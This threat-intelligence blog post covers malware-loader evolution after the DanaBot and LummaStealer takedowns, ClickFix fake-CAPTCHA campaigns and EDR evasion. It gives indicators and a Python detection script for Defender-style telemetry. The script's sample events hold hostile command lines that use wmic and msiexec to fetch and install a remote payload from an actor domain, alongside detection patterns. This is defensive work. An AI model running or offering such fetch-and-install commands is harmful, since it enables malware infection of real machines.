Contributors: Niranjan Jayanand, Veena Sagar, Gouri Santhosh
Financially motivated cybercrime keeps malicious code under constant, rapid development, because buyers and affiliates working for different threat groups pay for loaders that still get past defences. The recent takedowns of DanaBot and LummaStealer are significant wins, but history shows that financially motivated cybercriminals adapt quickly, developing or adopting new malicious loaders to keep their operations running. In this post we give an overview, drawn from our cyber threat intelligence (CTI) analysis, of how these malware loaders have evolved to bypass some EDR solutions, and what to expect in the coming days and weeks.
CyberProof's Threat Intelligence team draws on a variety of data sources, including indicators of compromise (IoCs), the tools used by threat actors, and detailed threat analyses. This information is gathered from many channels: open-source intelligence (OSINT), social media, deep and dark web sources, and more. The value of CTI lies not only in reacting to existing threats, but in anticipating future ones from the shape of the current threat landscape.
Malicious Loaders and Takedowns
Malicious loaders are constantly modified and offered as malware-as-a-service (MaaS) by financially motivated cybercriminal groups. Qakbot, one of the oldest and most damaging malware loaders, active since at least 2009 and used by several human-operated ransomware groups including Conti, Egregor, and DoppelPaymer, was taken down in Operation Duck Hunt, announced on August 29, 2023.
Emotet has been active and evolving since 2014. Before its takedown in January 2021, Emotet had infected more than 1.6 million victim computers and caused hundreds of millions of dollars in damage worldwide, supporting multiple ransomware operations including Ryuk (the precursor of Conti). The takedown proved temporary, and the botnet resurfaced later that year.
The second half of May 2025 saw the takedown of the DanaBot and LummaStealer operations by law enforcement together with security companies including Amazon, CrowdStrike, ESET, Flashpoint, Google, Intel 471, Lumen, PayPal, Proofpoint, SpyCloud, Team Cymru, and Zscaler. Rotating to a new loader after a mass takedown is nothing new for cybercriminals: a loader that gains popularity with researchers and law enforcement is soon replaced. Researchers constantly pivot through criminal forums and CTI feeds to track new malicious code, upgrades, sales, and use in targeted operations.
Following the DanaBot and LummaStealer takedowns, we expect either a completely new loader that is quickly adopted across infostealer families, or an existing loader such as IDATLoader (aka HijackLoader) receiving further modular updates that make analysis harder. The 2025 DanaBot investigation was led by the FBI's Anchorage Field Office and the Defense Criminal Investigative Service, working closely with Germany's Bundeskriminalamt (BKA), the Netherlands National Police, and the Australian Federal Police. The Justice Department's Office of International Affairs provided significant assistance.
LummaStealer was one of the most active MaaS infostealers used by eCrime groups for well over the past 18 months.
LummaStealer and other eCrime threat actors are highly opportunistic and can target any organization globally, as the heat map below shows. Source: LummaStealer heat map (Microsoft).
The LummaStealer takedown was carried out in partnership across government and industry, including the cybersecurity companies ESET, Bitsight, Lumen, Cloudflare, CleanDNS, and GMO Registry, each of which helped by quickly taking down online infrastructure.
LummaStealer was the top threat hitting the finance sector worldwide through fake CAPTCHA campaigns. Other malware families spread through fake CAPTCHAs include XWorm, VenomRAT, AsyncRAT, DanaBot, SectopRAT, Rhadamanthys, and NetSupport RAT. IDATLoader (aka HijackLoader) was used heavily during the surge of ClickFix activity over the last three quarters.
How eCrime Loaders Stay Undetected
Fake CAPTCHA (ClickFix) campaigns have been abused by both eCrime and APT groups against organizations worldwide for several quarters now, and multiple EDR products have failed to block them. The lure convinces the user to paste and run a command themselves, so the initial execution is user-initiated rather than the result of an exploit.
The latest ClickFix variant, which runs through conhost.exe, abuses LOLBAS binaries and WMI to install the payload; in many instances neither Defender nor SentinelOne raised an alert.
In the captured telemetry, msiexec.exe fetched the package directly from insufflating.lol, which resolved to 172.67.208.19.
The remote payload [SHA256: 6502325c5ad996eeffbe05990c4b34f3b53e6c480e1961aef9666e9ab847763a] was written to disk with a .tmp extension rather than .msi.
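The behaviours above (a LOLBAS launched under conhost.exe, WMI used as the process launcher, msiexec.exe installing straight from a URL, and a .tmp file written by msiexec.exe) can each be expressed as a simple detection rule. The script below is an added example written for this post; it is not the Defender queries referenced later and not CyberProof tooling. It runs those rules over constructed, MDE-shaped process and file events (column names borrowed from DeviceProcessEvents and DeviceFileEvents; the event rows, the illustrative URL path, and the LOLBAS list are assumptions), and only the domain and SHA256 indicators come from the post. A benign local msiexec install is included to show that the rules do not fire on it.

```python
"""Triage constructed MDE-style events for the conhost.exe / WMI / msiexec
ClickFix chain.  Added example for this post, not the original GitHub
queries; the event rows below are constructed, not captured telemetry."""
import re
from dataclasses import dataclass
from typing import Dict, List

# Indicators quoted in the post.  Everything else in this file is an assumption.
KNOWN_BAD_SHA256 = {"6502325c5ad996eeffbe05990c4b34f3b53e6c480e1961aef9666e9ab847763a"}
KNOWN_BAD_HOSTS = {"insufflating.lol"}

# LOLBAS children worth flagging when conhost.exe or WMI is the launcher
# (assumed list; extend it for your own estate).
LOLBAS = {"msiexec.exe", "wmic.exe", "powershell.exe", "mshta.exe", "curl.exe", "cmd.exe"}

URL_RE = re.compile(r"https?://([a-z0-9.\-]+)", re.IGNORECASE)
WMI_LAUNCH_RE = re.compile(r"process\s+call\s+create|win32_process.*\bcreate\b", re.IGNORECASE)
MSI_INSTALL_RE = re.compile(r"(?:^|\s)/(?:i|package|a)\b", re.IGNORECASE)


@dataclass(frozen=True)
class Finding:
    rule: str
    device: str
    evidence: str


def remote_hosts(cmdline: str) -> List[str]:
    """Hostnames of every http(s) URL embedded in a command line."""
    return [m.group(1).lower() for m in URL_RE.finditer(cmdline)]


def check_process_event(ev: Dict[str, str]) -> List[Finding]:
    """Apply the process-level heuristics to one DeviceProcessEvents-like row."""
    child = ev["FileName"].lower()
    parent = ev["InitiatingProcessFileName"].lower()
    cmd = ev["ProcessCommandLine"]
    hosts = remote_hosts(cmd)
    out: List[Finding] = []
    # 1. msiexec installing straight from a URL: no .msi ever lands on disk
    if child == "msiexec.exe" and hosts and MSI_INSTALL_RE.search(cmd):
        out.append(Finding("msiexec_remote_install", ev["DeviceName"], cmd))
    # 2. WMI as the launcher: wmic on the command line, or a LOLBAS child of WmiPrvSE
    if (child == "wmic.exe" and WMI_LAUNCH_RE.search(cmd)) or (parent == "wmiprvse.exe" and child in LOLBAS):
        out.append(Finding("wmi_process_launch", ev["DeviceName"], f"{parent} -> {cmd}"))
    # 3. conhost.exe parenting a LOLBAS: the Run-dialog ClickFix variant
    if parent == "conhost.exe" and child in LOLBAS:
        out.append(Finding("conhost_spawns_lolbas", ev["DeviceName"], f"{parent} -> {cmd}"))
    # 4. Exact match on the domain indicator from the post
    if any(h in KNOWN_BAD_HOSTS for h in hosts):
        out.append(Finding("known_bad_host", ev["DeviceName"], ",".join(hosts)))
    return out


def check_file_event(ev: Dict[str, str]) -> List[Finding]:
    """Apply the file-level heuristics to one DeviceFileEvents-like row."""
    out: List[Finding] = []
    # 5. msiexec writing a .tmp: the remote package lands without an .msi extension
    if ev["InitiatingProcessFileName"].lower() == "msiexec.exe" and ev["FileName"].lower().endswith(".tmp"):
        out.append(Finding("msiexec_writes_tmp", ev["DeviceName"], ev["FolderPath"] + ev["FileName"]))
    if ev.get("SHA256", "").lower() in KNOWN_BAD_SHA256:
        out.append(Finding("known_bad_sha256", ev["DeviceName"], ev["SHA256"]))
    return out


def triage(process_events: List[Dict[str, str]], file_events: List[Dict[str, str]]) -> Dict[str, List[str]]:
    """Group rule hits per device so a host showing the whole chain stands out."""
    hits: Dict[str, List[str]] = {}
    for ev in process_events:
        for f in check_process_event(ev):
            hits.setdefault(f.device, []).append(f.rule)
    for ev in file_events:
        for f in check_file_event(ev):
            hits.setdefault(f.device, []).append(f.rule)
    return hits


# Constructed sample telemetry (not captured data).  WS01 replays the chain from
# the post (the URL path "/installer" is made up); WS02 is a routine local install.
SAMPLE_PROCESS_EVENTS = [
    {"DeviceName": "WS01", "InitiatingProcessFileName": "explorer.exe", "FileName": "conhost.exe",
     "ProcessCommandLine": 'conhost.exe --headless wmic process call create "msiexec /i https://insufflating.lol/installer /qn"'},
    {"DeviceName": "WS01", "InitiatingProcessFileName": "conhost.exe", "FileName": "wmic.exe",
     "ProcessCommandLine": 'wmic process call create "msiexec /i https://insufflating.lol/installer /qn"'},
    {"DeviceName": "WS01", "InitiatingProcessFileName": "WmiPrvSE.exe", "FileName": "msiexec.exe",
     "ProcessCommandLine": "msiexec /i https://insufflating.lol/installer /qn"},
    {"DeviceName": "WS02", "InitiatingProcessFileName": "explorer.exe", "FileName": "msiexec.exe",
     "ProcessCommandLine": 'msiexec /i "C:\\Users\\a\\Downloads\\7zip.msi" /qn'},
]
SAMPLE_FILE_EVENTS = [
    {"DeviceName": "WS01", "InitiatingProcessFileName": "msiexec.exe", "FileName": "MSI4F2A.tmp",
     "FolderPath": "C:\\Windows\\Temp\\",
     "SHA256": "6502325c5ad996eeffbe05990c4b34f3b53e6c480e1961aef9666e9ab847763a"},
]

if __name__ == "__main__":
    for device, rules in triage(SAMPLE_PROCESS_EVENTS, SAMPLE_FILE_EVENTS).items():
        print(device, sorted(set(rules)))
```

Rules 1 to 3 and 5 are behavioural and survive a change of domain or hash; rules 4 and 6 are exact IOC matches and will go stale as soon as the actor rotates infrastructure, which is why the triage groups hits per device rather than alerting on any single indicator.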
Two queries for Microsoft Defender for Endpoint (MDE) can be found on GitHub:
Query 2 has been validated and performed as expected in our recent testing. Results are shown below:
Conclusion
The CyberProof Threat Research team assesses with high confidence that the DanaBot and LummaStealer takedowns will not slow down eCrime campaigns. We expect new loader variants to be adopted quickly by infostealer payloads for initial access, and to support more sophisticated ransomware and APT groups.
We will continue to work closely with our internal teams to keep our detection logic updated for whatever variants appear in the coming days.